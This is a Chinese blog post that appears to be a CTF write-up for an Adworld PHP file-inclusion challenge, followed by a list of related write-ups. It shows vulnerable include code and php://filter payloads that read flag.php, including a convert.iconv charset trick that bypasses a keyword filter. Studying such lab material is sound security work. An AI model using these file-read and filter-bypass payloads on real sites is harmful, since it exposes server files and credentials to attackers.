文件包含(攻防世界)

最新推荐文章于 2024-04-09 15:16:04 发布
最新推荐文章于 2024-04-09 15:16:04 发布
阅读量245 收藏
点赞数
文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_70819573/article/details/129069211
版权

1.审计代码

<?php
highlight_file(__FILE__);
    include("./check.php");
    if(isset($_GET['filename'])){
        $filename  = $_GET['filename'];
        include($filename);
    }
?>

2.文件包含新姿势

除了使其运行php代码外,可以通过伪协议来读取文件,(默认flag地址/var/www/html/flag.php)

首先,用常见的

/?filename=php://filter/read=convert.base64-encode/resource=/var/www/html/flag.php

来读取flag,回显do not hack

接着考虑过滤器和字符集的问题,

常见过滤器有

  • onvert.base64
  • convert.quoted
  • convert.iconv.[]
  • 字符串过滤器

常见php可接受的字符集有

UCS-4*
UCS-4BE
UCS-4LE*
UCS-2
UCS-2BE
UCS-2LE
UTF-32*
UTF-32BE*
UTF-32LE*
UTF-16*
UTF-16BE*
UTF-16LE*
UTF-7
UTF7-IMAP
UTF-8*
ASCII*
EUC-JP*
SJIS*
eucJP-win*
SJIS-win*
...
\\具体支持的编码可见php官方文档
\\https://www.php.net/manual/zh/mbstring.supported-encodings.php

于是有payload:

?filename=php://filter//convert.iconv..UTF-7.UCS-4*/resource=/var/www/html/flag.php

ha0cker
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
攻防世界 文件包含总结思路
qq_56559508的博客
11-18 941
web安全 php 文件包含
文件包含--Web_php_include(攻防世界)
Curry197的博客
05-29 725
<?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page); ?> 参考链接:Web_php_include_怪味巧克力的博客-CSDN博客 先认识一下代码里的两个函数: strstr: strstr(str1,st.
攻防世界】题目名称-文件包含
最新发布
wangzhemvp的博客
04-09 655
一直显示 do not hack!,可能是 include("./check.php") 过滤了。依次尝试如下payload,还是提示 do not hack。看到 include(),想到文件包含,用php伪协议。convert.iconv. 要一个一个的破解。(1)php://filter 其他编码方式。convert.iconv.[ ]过滤器。,想到文件包含,用php伪协议。找到输出编码,再找输入编码。
【愚公系列】2023年05月 攻防世界-Web(题目名称-文件包含
时光隧道
05-27 8234
文件包含漏洞(File Inclusion Vulnerability)是一种常见的Web应用程序漏洞,攻击者可以通过Web应用程序的漏洞,以某种形式包含恶意文件,或者包含在Web服务器上的其他敏感文件,从而实现权限提升、信息泄露、远程代码执行等攻击。具体案例介绍包括://定义一个变量$file并将其传递给include函数中执行 $file = $_GET [ 'file' ];攻击者通过修改传递的$file变量,替换为恶意代码文件,最终实现远程代码执行攻击。
攻防世界—file_include
小缪的博客
06-10 2783
这种漏洞通常存在于代码中,允许攻击者将未经过滤的输入作为参数传递给文件包含函数(如include()、require()等),从而加载恶意脚本或者敏感文件到服务器上,并进一步攻击系统。这种漏洞通常发生在应用程序没有对用户输入进行过滤的情况下,接受用户的输入来指定文件名或者路径,并将其传递给包含函数的时候。2.远程文件包含(RFI):攻击者通过构造一个URL链接,将远程服务器上的恶意脚本地址传递给包含函数,从而导致远程服务器上的脚本被执行。对于指定过滤器的更多信息,请参考该函数的手册页。该过滤器不支持参数,
攻防世界-泰山杯-简单的文件包含
wwxxss
11-11 1389
使用burp的熟练对其进行爆破,再次了解文件包含的一些协议来查看文件
攻防世界Wire1杂项
11-20
攻防世界Wire1杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127951997
攻防世界流量分析2杂项
11-20
攻防世界流量分析2杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127953659
攻防世界杂项m0-01
11-13
攻防世界杂项m0_01,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127836871
攻防世界running
11-15
攻防世界running杂项,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127861757
攻防世界Fakezip杂项
11-20
攻防世界Fakezip杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127952541
攻防世界—-(web进阶)FlatScience–WP
12-14
打开题目: 发现都是pdf文件。看不懂 先来一套广播体操:我用的是御剑和AWVS 发现两个有趣的页面: 1.login.php 2.admin.php (还有一个robots.txt, 打开之后也是指向上面两个页面的) 先试一下admin.php,尝试几个密码登陆没有结果。 查看页面源代码 有提示,就先暂时先不考虑弱口令 打开另一个页面login.php 查看源代码,依旧有提示 按照提示转到login.php?debug页面 成功读取源代码 创建了一个SQLite3对象,查阅得知是一个数据库 在下面这句话里存在注入 参考网上的WP 查询字段: 构造查询密码的SQL:usr=' UNI
攻防世界——文件包含与伪协议
yanfangjie的博客
01-17 709
Web_php_include <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page); ?> 分析这段代码的意思 strstr(page,"php://"):匹配PHP://在page,"php://"):匹配PHP:/
攻防世界(题目名称-文件包含
……
09-14 1183
php协议过滤器绕过
攻防世界 web php include,攻防世界-Web_php_include (四种解法)
weixin_36035466的博客
03-09 303
攻防世界-Web_php_include (考察的是文件包含)打开页面是这样一段代码从代码中得知page中带有php://的都会被替换成空str_replace()以其他字符替换字符串中的一些字符(区分大小写)strstr() 查找字符串首次出现的位置。返回字符串剩余部分}include($page);?>分析代码可知程序过滤掉了page=参数传入php://第一种方法(大小写绕过)大小...
攻防世界-Web_php_include [文件包含]
weixin_53146913的博客
04-15 535
意思是当传给page的参数里有php://时,会自动过滤掉,但是此函数对大小写敏感,构造Php://就不起作用了,而stristr()函数对大小写不敏感噢。 一、双写、大小写绕过: 大小写可直接绕过。 但是由于源代码中是while循环过滤,所以我们的双写过滤就G了QAQ。 二、利用hello的回显 我们构造payload,首先要构造hello这个参数我们必须先让传进的page参数为真 page参数用http伪协议访问127.0.0.1这个条件肯定为真 payload: ?pa.
攻防世界 - (题目名称-文件包含)
shawdow_bug的博客
09-18 4036
writeup
攻防世界web区简单文件包含
qq_71924054的博客
01-01 294
1.题目: 可以看出应该用get方式提交两个变量,file1和file2。 题中说file2被放入file_get_contents函数里面且返回值是hello ctf 可以看到php://input可以使我们用post的方式提交一个hello ctf给file2。 而对于file1因为是文件包含可以用filter伪协议(感觉就是能读取文件的东西,还没有深入了解) 然后输入file1和file2 用burpsuit抓包后修改为post提交方式,在最后输入hello ctf
攻防世界】二十一 --- ics-05 --- 文件包含
qq_43168364的博客
12-29 389
题目 — ics-05 一、writeup 主页只有一个点可以访问 访问之后再点击下面的图表URL会发生变化 ?page查询字符串出来了 page查询字符串中存在文件包含漏洞,可以进行目录跳转 这里php://input被过滤了,无法直接使用php://input来读取flag了。需要想其他办法。直接包含index.php文件会回显Ok 想到是否做了过滤,用:php://filter/read=convert.base64-encode/resource=index.php 访问成功 解编码得到
攻防世界文件包含读文件
10-01
关于攻防世界文件包含读文件的问题,你提到了一个例子file1=php://filter/read=convert.base64-encode/resource=flag.php。这是一种利用php内置的filter机制,将文件内容以base64编码的形式读取出来。在这个例子中,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值